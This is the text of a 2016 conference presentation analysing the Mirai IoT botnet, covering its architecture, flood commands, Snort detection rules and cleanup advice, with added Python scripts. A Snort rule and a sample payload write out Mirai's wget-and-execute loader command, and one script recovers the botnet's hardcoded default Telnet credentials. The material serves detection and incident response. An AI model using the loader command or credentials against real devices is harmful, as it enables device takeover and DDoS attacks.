Look Into The Future - Analyzing Mirai botnet - Mauritius 2016 FIRST TC Minoru Kobayashi Internet Initiative Japan Inc.
Who am I?
• Minoru Kobayashi
• I work for “Internet Initiative Japan Inc.” (IIJ).
• IIJ is a Japanese ISP (we were the first commercial ISP in Japan).
• CISSP
• I’m a member of the CSIRT called “IIJ-SECT”.
  • We are incident responders for our customers and our company.
• Our jobs include:
  • Malware analysis
  • Forensic investigation
  • Incident response and handling
  • Developing and operating a honeypot and web crawler system
  • Surveying malware and attack technique trends
  • Hands-on trainer, speaker
    • Including Black Hat, FIRST, internal lectures for the Japanese government, and so on.
  • Writing for our quarterly report (called “IIR”) and blogs
What is the Mirai botnet?
• A Distributed Denial of Service (DDoS) system.
• Infects IoT devices via Telnet (23/tcp).
  • IoT device = network camera, digital video recorder, router, and so on.
  • Uses a dictionary attack (factory default passwords).
• Mirai was used to attack “Krebs on Security” and “OVH” in late September.
  • Krebs on Security: 620 Gbps
  • OVH: over 1 Tbps
• “Anna-senpai” suddenly released the Mirai source code in early October.
  • Anna-senpai is the author of Mirai.
What does “Mirai” mean?
• In Japanese, Mirai can be written as “未来”. These Kanji characters are pronounced “Mirai”.
• “未来” means “the future” in English. So I gave this presentation the title “Looking Into The Future”.
BTW, who is Anna-senpai?
• The source code release announcement was posted on the hacking community “Hackforums”.
• He (she?) used a Japanese animation character as an avatar, and the handle name is “Anna-senpai”.
• I don’t know that name. Let’s google. Who is she?
Anna-senpai is…
• Anna-senpai is the name of a Japanese animation character. The story of this animation is set in a fictional future.
• Anna-senpai (the author of Mirai) may be an animation otaku. So I think that is why Anna-senpai called this malware Mirai.
  • Otaku is Japanese slang, a synonym for a geek.
• One more interesting thing: the source code of Mirai contains some Russian strings. Therefore Anna-senpai or his/her related parties could be Russian-speaking people.
Mirai is Open Source now.
Dive to source code
Mirai Botnet System Architecture
(Architecture diagram, reconstructed as a list.) Components: Admin/User, C&C, DB, Scan Receiver, Loader, HTTP/TFTP Server, IoT (Bot), IoT (Victim), Victim Server.
① Register Bot (IoT bot → C&C)
② Scan random IP addresses and attempt to login (IoT bot → IoT victim)
③ Report the IP address and credential (IoT bot → Scan Receiver)
④ Pass credentials (Scan Receiver → Loader)
⑤ Send commands to download Bot binary (Loader → IoT victim)
⑥ Request to download Bot binary (IoT victim → HTTP/TFTP Server)
⑦ Execute Bot binary (IoT victim becomes an IoT bot)
⑧ Use Mirai via CLI/API (Admin/User → C&C)
⑨ DDoS Attack (IoT bots → Victim Server)
Attack command list
Attack ID  Command   Description
0          udp       UDP flood
1          vse       Valve source engine specific flood
2          dns       DNS resolver flood using the target’s domain; input IP is ignored
3          syn       SYN flood
4          ack       ACK flood
5          stomp     TCP stomp flood
6          greip     GRE IP flood
7          greeth    GRE Ethernet flood
8          (none)    Proxy knockback connection
9          udpplain  UDP flood with fewer options, optimized for higher PPS
10         http      HTTP flood
Attack ID 8 is assigned, but not implemented.
Dive to source code again
• The credentials for IoT devices are hardcoded and obfuscated.
• You can see this list in mirai/bot/scanner.c.
• Mirai has 61 kinds of credentials.
• To de-obfuscate them, XOR each byte with 0x22.
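As an added example (not code from the slides or from the Mirai source), the de-obfuscation described above, written in Python so an analyst can recover the plaintext credential list from a copy of scanner.c for their own blocklists or honeypot matching. The credential entries are assumed to be in the add_auth_entry("<user>", "<password>", <weight>); call format used in mirai/bot/scanner.c; the two sample entries below are constructed for this example (they are not the 61 real entries).

```python
import re

XOR_KEY = 0x22  # single-byte key the slide names


def deobfuscate(blob: bytes, key: int = XOR_KEY) -> str:
    """XOR every byte with the key. XOR is its own inverse, so the same
    operation turns a plaintext credential back into the obfuscated form."""
    return bytes(b ^ key for b in blob).decode("ascii")


def obfuscate(text: str, key: int = XOR_KEY) -> bytes:
    return bytes(b ^ key for b in text.encode("ascii"))


# Constructed sample (not the real list) in the add_auth_entry(...) format of
# mirai/bot/scanner.c: obfuscated user, obfuscated password, selection weight.
SAMPLE_SCANNER_C = r'''
add_auth_entry("\x50\x4D\x4D\x56", "\x13\x10\x11\x16\x17", 9);
add_auth_entry("\x43\x46\x4F\x4B\x4C", "\x52\x43\x51\x51\x55\x4D\x50\x46", 5);
'''

# Each string is a run of \xHH escapes (possibly empty, e.g. a blank password).
ENTRY_RE = re.compile(
    r'add_auth_entry\("((?:\\x[0-9A-Fa-f]{2})*)",\s*"((?:\\x[0-9A-Fa-f]{2})*)",\s*(\d+)\);'
)


def parse_escaped(s: str) -> bytes:
    """Turn a C-style '\x50\x4D' escape string into raw bytes."""
    return bytes(int(h, 16) for h in re.findall(r'\\x([0-9A-Fa-f]{2})', s))


def extract_credentials(source: str):
    """Return [(user, password, weight), ...] for every add_auth_entry call."""
    creds = []
    for m in ENTRY_RE.finditer(source):
        user = deobfuscate(parse_escaped(m.group(1)))
        password = deobfuscate(parse_escaped(m.group(2)))
        creds.append((user, password, int(m.group(3))))
    return creds


if __name__ == "__main__":
    for user, password, weight in extract_credentials(SAMPLE_SCANNER_C):
        print(f"{user}:{password} (weight {weight})")
```

Running the script against a local copy of scanner.c instead of SAMPLE_SCANNER_C (read the file and pass its contents to extract_credentials) yields the full plaintext list; the weight column is the relative frequency with which the bot picks that pair during a scan.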
Can I detect it?
• The answer is… YES!!
• None of the Mirai communications are encrypted, so you can write IDS/IPS signatures easily.
• You can see it like below (packet capture screenshot): this traffic is part of process ⑤. You can see the “/bin/busybox wget” command.
Snort Signatures
• Snort is one of the most popular open source IDS/IPS.
• You can write signatures to detect Mirai like below:
• Register Bot (Process ①)
  alert tcp any any -> any 23 (msg:"Mirai Botnet: Register Bot with C&C"; flow:to_server,established; content:"|00 00 00 01|"; depth:4; sid:1000000; rev:1;)
• Send a command to Download Bot (Process ⑤)
  alert tcp any any -> any [23,2323] (msg:"Mirai Botnet: Download Bot binary via Telnet (wget)"; flow:to_server,established; content:"/bin/busybox wget http://"; content:"/bins/mirai."; content:"-O - > dvrHelper|3b| /bin/busybox chmod 777 dvrHelper|3b| /bin/busybox ECCHI"; sid:1000070; rev:1;)
• But attackers can easily modify these indicators of attack, so these may not detect new versions or variants of Mirai. Be careful.
• All the Snort signatures I wrote will be published in the next issue of our quarterly report IIR (Vol.33).
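To check that the two rules above actually fire on the traffic they target, here is an added example (my own Python, not Snort and not code from the slides) that re-implements the content-matching semantics they rely on: depth limits the search to the first N bytes of the payload, and every content option must be found, here in the order written (|3b| in the rule is the ';' byte). The three sample payloads are constructed for this example; the loader address 192.168.153.100 is from the demo environment, while the ".arm7" file suffix is an assumption.

```python
# Content patterns lifted from the two Snort rules above.
REGISTER_CONTENT = b"\x00\x00\x00\x01"          # |00 00 00 01| with depth:4
DOWNLOAD_CONTENTS = [                            # |3b| written out as ';'
    b"/bin/busybox wget http://",
    b"/bins/mirai.",
    b"-O - > dvrHelper; /bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI",
]


def content_match(payload: bytes, pattern: bytes, depth: int = 0, start: int = 0) -> int:
    """Offset of pattern in payload searching from `start`, restricted to the
    first `depth` bytes of that window when depth > 0; -1 if absent."""
    window = payload[start:start + depth] if depth > 0 else payload[start:]
    idx = window.find(pattern)
    return -1 if idx < 0 else start + idx


def matches_register_bot(payload: bytes) -> bool:
    """Rule sid:1000000 - the 4-byte marker must sit inside the first 4 bytes,
    which for a 4-byte pattern means at offset 0."""
    return content_match(payload, REGISTER_CONTENT, depth=4) == 0


def matches_download_command(payload: bytes) -> bool:
    """Rule sid:1000070 - all three content strings must appear, in order."""
    pos = 0
    for pattern in DOWNLOAD_CONTENTS:
        idx = content_match(payload, pattern, start=pos)
        if idx < 0:
            return False
        pos = idx + len(pattern)
    return True


# Constructed sample payloads (not captures from the slides).
REGISTER_PAYLOAD = b"\x00\x00\x00\x01\x00"
DOWNLOAD_PAYLOAD = (
    b"/bin/busybox wget http://192.168.153.100/bins/mirai.arm7 -O - > dvrHelper; "
    b"/bin/busybox chmod 777 dvrHelper; /bin/busybox ECCHI\r\n"
)
TELNET_BANNER = b"\xff\xfd\x18\xff\xfd\x20login: "  # ordinary Telnet negotiation


if __name__ == "__main__":
    for name, payload in [("register", REGISTER_PAYLOAD),
                          ("download", DOWNLOAD_PAYLOAD),
                          ("banner", TELNET_BANNER)]:
        print(name, matches_register_bot(payload), matches_download_command(payload))
```

The point of the third check is the caveat on the slide: the banner is benign and neither rule fires, but any change to the file name, the output path or the ECCHI marker in a variant would also stop the second rule from firing, which is why the register-bot rule on the 4-byte prefix is the more durable of the two.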
Demo 1 Using Mirai
Demo 1 environment
(Same architecture diagram as before, with demo addresses; reconstructed as a list.) Components: Admin/User, C&C, DB, Scan Receiver, Loader, HTTP/TFTP Server, IoT (Bot), IoT (Victim), Victim Server. Addresses shown in the diagram: 192.168.153.10 and 192.168.153.100 on the C&C/loader side, 192.168.153.20 beside the IoT bot.
① Register Bot
② Scan random IP addresses and attempt to login
③ Report the successful IP address and credential
④ Transfer credentials
⑤ Send commands to download Bot binary
⑥ Request to download Bot binary
⑦ Run Bot binary
⑧ Use Mirai via CLI/API
⑨ DDoS Attack
Demo 2 Detect Mirai by Snort
How can you check whether your IoT device is infected?
1. Check the number of connections to 23/tcp and 2323/tcp.
  • The Mirai bot mostly scans 23/tcp, but once in 10 times it scans 2323/tcp.
  • It always scans random IPs, so the number of connections to these ports rises abruptly.
2. Check whether you can still reach the management port.
  • You may not be able to reach the management port of the IoT device (e.g. Telnet, SSH, WebUI, etc.).
  • Mirai kills the management processes on the IoT device.
  • I believe this is to protect it from other IoT bot malware and to get high performance for DDoS.
3. Of course, you can also use Snort.
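Check 1 above can be automated from the gateway's own firewall logs. The following is an added example (my Python, not from the slides): it parses iptables-LOG style lines (that format is an assumption), counts, per source address, how many distinct destinations were probed on 23/tcp and 2323/tcp, and flags a source once it exceeds a threshold of distinct destinations. The log lines are constructed for the example, with the bot at 192.168.153.20 (the demo bot address) probing 20 hosts, one in ten on 2323/tcp, plus a benign neighbour.

```python
import re
from collections import defaultdict

# iptables LOG-style fields; only SRC, DST and DPT are used.
LOG_RE = re.compile(r"SRC=(?P<src>[\d.]+) DST=(?P<dst>[\d.]+).*?DPT=(?P<dpt>\d+)")
TELNET_PORTS = (23, 2323)


def build_sample_log():
    """Constructed sample log: one scanning bot and one ordinary host."""
    lines = [
        f"Oct 20 10:00:{i:02d} kernel: IN=eth0 OUT=eth1 SRC=192.168.153.20 "
        f"DST=203.0.113.{i + 1} PROTO=TCP DPT={2323 if i % 10 == 9 else 23} SYN"
        for i in range(20)
    ]
    lines += [
        "Oct 20 10:00:30 kernel: IN=eth0 OUT=eth1 SRC=192.168.153.30 DST=203.0.113.7 PROTO=TCP DPT=23 SYN",
        "Oct 20 10:00:31 kernel: IN=eth0 OUT=eth1 SRC=192.168.153.30 DST=203.0.113.8 PROTO=TCP DPT=443 SYN",
    ]
    return lines


def summarize_telnet_probes(lines):
    """Per source: distinct destinations and hit counts on 23 and 2323."""
    stats = defaultdict(lambda: {"dst": set(), "to_23": 0, "to_2323": 0})
    for line in lines:
        m = LOG_RE.search(line)
        if not m:
            continue                      # not a firewall log line
        dpt = int(m["dpt"])
        if dpt not in TELNET_PORTS:
            continue                      # only the two Mirai scan ports count
        entry = stats[m["src"]]
        entry["dst"].add(m["dst"])
        entry["to_23" if dpt == 23 else "to_2323"] += 1
    return {
        src: {"distinct_dst": len(s["dst"]), "to_23": s["to_23"], "to_2323": s["to_2323"]}
        for src, s in stats.items()
    }


def suspected_scanners(lines, min_distinct_dst=10):
    """Sources that touched at least `min_distinct_dst` different hosts on
    23/2323; a legitimate device rarely talks Telnet to many strangers."""
    summary = summarize_telnet_probes(lines)
    return sorted(src for src, s in summary.items() if s["distinct_dst"] >= min_distinct_dst)


if __name__ == "__main__":
    sample = build_sample_log()
    for src, s in summarize_telnet_probes(sample).items():
        print(src, s)
    print("suspected scanners:", suspected_scanners(sample))
```

The distinct-destination count is the useful signal; the 23:2323 split (about 9:1 here) is only corroboration, since a variant can change that ratio more easily than it can stop scanning. Feed the script a real log by reading the file into a list of lines and passing it to suspected_scanners.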
Conclusion
• Check immediately whether your IoT device is infected.
• To remove Mirai, just reboot the device. It’s easy.
• Change the login password of the IoT device.
  • Attackers already know the default password, because it is in the online manual.
• Don’t connect IoT devices directly to the Internet.
  • If you need access from the Internet, set up an access control list.
  • If possible, use encrypted management protocols such as SSH/HTTPS.
Thank you